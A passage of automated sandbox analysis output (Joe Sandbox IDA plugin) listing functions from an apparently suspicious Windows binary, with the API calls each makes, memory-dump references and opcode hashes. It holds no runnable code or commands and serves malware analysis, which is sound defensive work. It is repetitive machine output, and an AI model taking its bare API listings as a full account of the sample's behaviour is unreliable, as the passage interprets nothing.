                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 420147892-0
                                                                                • Opcode ID: 07673b768bcc707ecfb4c8934568cc089baf2831f4628c8f703d6806e16ef36c
                                                                                • Instruction ID: d436865c8641f3ad509055f1ff5e57fdce1fabce12116ffd7048bbd4ebb77642
                                                                                • Opcode Fuzzy Hash: 07673b768bcc707ecfb4c8934568cc089baf2831f4628c8f703d6806e16ef36c
                                                                                • Instruction Fuzzy Hash: 67319E711082019FD311EF54D885AAFBFE9FFD9354F14092EF581822A1EB719949CB92
                                                                                Function 00668FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • GetCursorPos.USER32(?), ref: 00669001
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00627711,?,?,?,?,?), ref: 00669016
                                                                                • GetCursorPos.USER32(?), ref: 0066905E
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00627711,?,?,?), ref: 00669094
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 6c694971bf317519ef65c82f32d5537f461b7e546d10d8e25e1914216b8a48f0
                                                                                • Instruction ID: 8f37337941dacb4c8d0b31e89acf6c5bad0b3d4296a55de096bdbbe4a1c928c6
                                                                                • Opcode Fuzzy Hash: 6c694971bf317519ef65c82f32d5537f461b7e546d10d8e25e1914216b8a48f0
                                                                                • Instruction Fuzzy Hash: 6B219C35601018FFCF299F94CC58EFA7BBBEB8A360F144069F9458B261C371A990DB60
                                                                                Function 0063D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(?,0066CB68), ref: 0063D2FB
                                                                                • GetLastError.KERNEL32 ref: 0063D30A
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0063D319
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0066CB68), ref: 0063D376
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 2267087916-0
                                                                                • Opcode ID: b153f85daf6262d6741f4657a74ffbd1b2e2d83fcb44d55a874617f5d42dcc2a
                                                                                • Instruction ID: 224e890e63d52a1a69980855332715b5307c3c9e14803956bf4b848df476342c
                                                                                • Opcode Fuzzy Hash: b153f85daf6262d6741f4657a74ffbd1b2e2d83fcb44d55a874617f5d42dcc2a
                                                                                • Instruction Fuzzy Hash: B6217E705096019FD310DF28E8854AA7BE9EE96724F104A1EF499C33A1DB319E4ACB93
                                                                                Function 00631571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00631014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0063102A
                                                                                  • Part of subcall function 00631014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00631036
                                                                                  • Part of subcall function 00631014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631045
                                                                                  • Part of subcall function 00631014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0063104C
                                                                                  • Part of subcall function 00631014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00631062
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006315BE
                                                                                • _memcmp.LIBVCRUNTIME ref: 006315E1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00631617
                                                                                • HeapFree.KERNEL32(00000000), ref: 0063161E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                • String ID:
                                                                                • API String ID: 1592001646-0
                                                                                • Opcode ID: 2796a7357525ba345e636d3830c35274cad38a692e63a791b1547f3595c0f21a
                                                                                • Instruction ID: 96204692e3f4af073c6ffc5fb50372c63f833942bcc05a508376401c59e41bbb
                                                                                • Opcode Fuzzy Hash: 2796a7357525ba345e636d3830c35274cad38a692e63a791b1547f3595c0f21a
                                                                                • Instruction Fuzzy Hash: 3A21AF71E00509EFDF00DFA5C945BEEB7BAEF46354F084469E441AB241E770AE05DBA0
                                                                                Function 00662782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0066280A
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00662824
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00662832
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00662840
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: b0b069560c1199767e95b7356a701a80a6653e17b830057a4c498f4d03c4645c
                                                                                • Instruction ID: c1ddd6d2500b34f8e78b10f03763a69c7fe56eaf1529cfbba1ff9d12db188d09
                                                                                • Opcode Fuzzy Hash: b0b069560c1199767e95b7356a701a80a6653e17b830057a4c498f4d03c4645c
                                                                                • Instruction Fuzzy Hash: EE219031205912AFD7149B24CC55FAA7B9AAF85324F14815DF4668B7E2C7B1EC42C7D0
                                                                                Function 006378F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00638D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0063790A,?,000000FF,?,00638754,00000000,?,0000001C,?,?), ref: 00638D8C
                                                                                  • Part of subcall function 00638D7D: lstrcpyW.KERNEL32(00000000,?,?,0063790A,?,000000FF,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00638DB2
                                                                                  • Part of subcall function 00638D7D: lstrcmpiW.KERNEL32(00000000,?,0063790A,?,000000FF,?,00638754,00000000,?,0000001C,?,?), ref: 00638DE3
                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00637923
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00637949
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00638754,00000000,?,0000001C,?,?,00000000), ref: 00637984
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: cd445650880b17703d142bb864f5b72fdf5c322ab7a81d85d1f8dfbea61197b0
                                                                                • Instruction ID: c86099e4df867f3ee99863c95f0d737302f7296e6f2843e2512c9f51e4e34e40
                                                                                • Opcode Fuzzy Hash: cd445650880b17703d142bb864f5b72fdf5c322ab7a81d85d1f8dfbea61197b0
                                                                                • Instruction Fuzzy Hash: 0A11E17A200342AFCB259F35C844EBA77AAFF85350B00412AF842CB3A4EB719801C7A1
                                                                                Function 00665660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 006656BB
                                                                                • _wcslen.LIBCMT ref: 006656CD
                                                                                • _wcslen.LIBCMT ref: 006656D8
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00665816
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend_wcslen
                                                                                • String ID:
                                                                                • API String ID: 455545452-0
                                                                                • Opcode ID: 0b733de439959ccf5d07868e1f4b956e1371c9de7540bb4fcaad09cdf8fe0318
                                                                                • Instruction ID: 01a13377cd78ab56c2eb3a521988e13a926187eded50c33770d6d3b0c03ceaf6
                                                                                • Opcode Fuzzy Hash: 0b733de439959ccf5d07868e1f4b956e1371c9de7540bb4fcaad09cdf8fe0318
                                                                                • Instruction Fuzzy Hash: 0711037160060996DF209F61CC86AFE3BADFF11764F10416AF926D6181EBB4DA80CF60
                                                                                Function 00631A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00631A47
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00631A59
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00631A6F
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00631A8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: ea0f1f6237a0611c982f7f5b04e1a6bfd26629404d174fa3c7447ad4bc317a6e
                                                                                • Instruction ID: 34bcedf4cef8becfeb87ced2b23071ca0d14978d27c9ed74bfe4373126f306b2
                                                                                • Opcode Fuzzy Hash: ea0f1f6237a0611c982f7f5b04e1a6bfd26629404d174fa3c7447ad4bc317a6e
                                                                                • Instruction Fuzzy Hash: 1F11393AD01219FFEB10DBA4CD85FADBB79EB09750F200092EA00BB290D6716E50DB94
                                                                                Function 0063E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0063E1FD
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 0063E230
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0063E246
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0063E24D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: 61dcd61879f9405c0b890c43dd9cbdf6b0bad36be9c139ebb8a50b92d577dbec
                                                                                • Instruction ID: 9a1ede1cd43702f1e43a020b3a11dfc7d7d42e7a5908099855e4bb03e5c19e66
                                                                                • Opcode Fuzzy Hash: 61dcd61879f9405c0b890c43dd9cbdf6b0bad36be9c139ebb8a50b92d577dbec
                                                                                • Instruction Fuzzy Hash: E8110876904654BBCB01AFA89C19AEF7FAFAB46320F004215F914E33D0D6B19A008BF0
                                                                                Function 005FD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,?,005FCFF9,00000000,00000004,00000000), ref: 005FD218
                                                                                • GetLastError.KERNEL32 ref: 005FD224
                                                                                • __dosmaperr.LIBCMT ref: 005FD22B
                                                                                • ResumeThread.KERNEL32(00000000), ref: 005FD249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 173952441-0
                                                                                • Opcode ID: 7695b8a3936d2455dd218a77530ec16c95a1d6eecd9125d8afc97db19ea8f581
                                                                                • Instruction ID: 047098645dbc3e973ae615aad68e057bbb3f01540e932bef9f638cc53e5068b9
                                                                                • Opcode Fuzzy Hash: 7695b8a3936d2455dd218a77530ec16c95a1d6eecd9125d8afc97db19ea8f581
                                                                                • Instruction Fuzzy Hash: EA01803A80560DBBDB116BA5DC09ABB7E7AFF82731F104219FA25961D0DBB58901C6B0
                                                                                Function 005D600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 005D604C
                                                                                • GetStockObject.GDI32(00000011), ref: 005D6060
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 005D606A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: 1f8009845728019f687f2190abcc8ba25a1931967092ce1e6a0107a795ca4b65
                                                                                • Instruction ID: 4f9db831795deb15ce2aabeecd303313076910738766a085426d5b6561f112bf
                                                                                • Opcode Fuzzy Hash: 1f8009845728019f687f2190abcc8ba25a1931967092ce1e6a0107a795ca4b65
                                                                                • Instruction Fuzzy Hash: A9118E72101508BFEF225F98CC58AEABF6AFF09364F040107FA1452110C7729C61DB91
                                                                                Function 005F3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 005F3B56
                                                                                  • Part of subcall function 005F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 005F3AD2
                                                                                  • Part of subcall function 005F3AA3: ___AdjustPointer.LIBCMT ref: 005F3AED
                                                                                • _UnwindNestedFrames.LIBCMT ref: 005F3B6B
                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 005F3B7C
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 005F3BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                • String ID:
                                                                                • API String ID: 737400349-0
                                                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction ID: 2e8e7f6edcbb35a034975a3fce74a2296d3d26c3300556e946aa06c036ddff1d
                                                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction Fuzzy Hash: 5201C53210014EBBEF125E95CC4AEEB7F6AFF98754F044015FA4866121C63AE9619BA0
                                                                                Function 00603073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005D13C6,00000000,00000000,?,0060301A,005D13C6,00000000,00000000,00000000,?,0060328B,00000006,FlsSetValue), ref: 006030A5
                                                                                • GetLastError.KERNEL32(?,0060301A,005D13C6,00000000,00000000,00000000,?,0060328B,00000006,FlsSetValue,00672290,FlsSetValue,00000000,00000364,?,00602E46), ref: 006030B1
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0060301A,005D13C6,00000000,00000000,00000000,?,0060328B,00000006,FlsSetValue,00672290,FlsSetValue,00000000), ref: 006030BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 5e9badd64de266b9acae1c648eec28b7d95cbcab445b2cef9f1da4ad8619df9d
                                                                                • Instruction ID: 5e85198d93f989791ce62eb5246cec1f97c53c744346cf1e61e2a5405c62dacc
                                                                                • Opcode Fuzzy Hash: 5e9badd64de266b9acae1c648eec28b7d95cbcab445b2cef9f1da4ad8619df9d
                                                                                • Instruction Fuzzy Hash: 9A01F732392732ABCB354B799C449A77B9EAF05B72B104621F947E73C0D721DA02C6E0
                                                                                Function 00637464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0063747F
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00637497
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006374AC
                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006374CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                • Opcode ID: 2e2ff4718e7d88dc5df3053aeeac34754bb0836c7a68febb35b87a11d7b3fb83
                                                                                • Instruction ID: 785a15b7e73cb4094919614026cf489c16ba3f32c543ab3b9850caf44d8f9231
                                                                                • Opcode Fuzzy Hash: 2e2ff4718e7d88dc5df3053aeeac34754bb0836c7a68febb35b87a11d7b3fb83
                                                                                • Instruction Fuzzy Hash: CC11A1F12057149BE730CF54EC08BA27BFEEB00B10F108569E656D6152D7B0F904DB90
                                                                                Function 0063B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0C4
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0E9
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B0F3
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063ACD3,?,00008000), ref: 0063B126
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
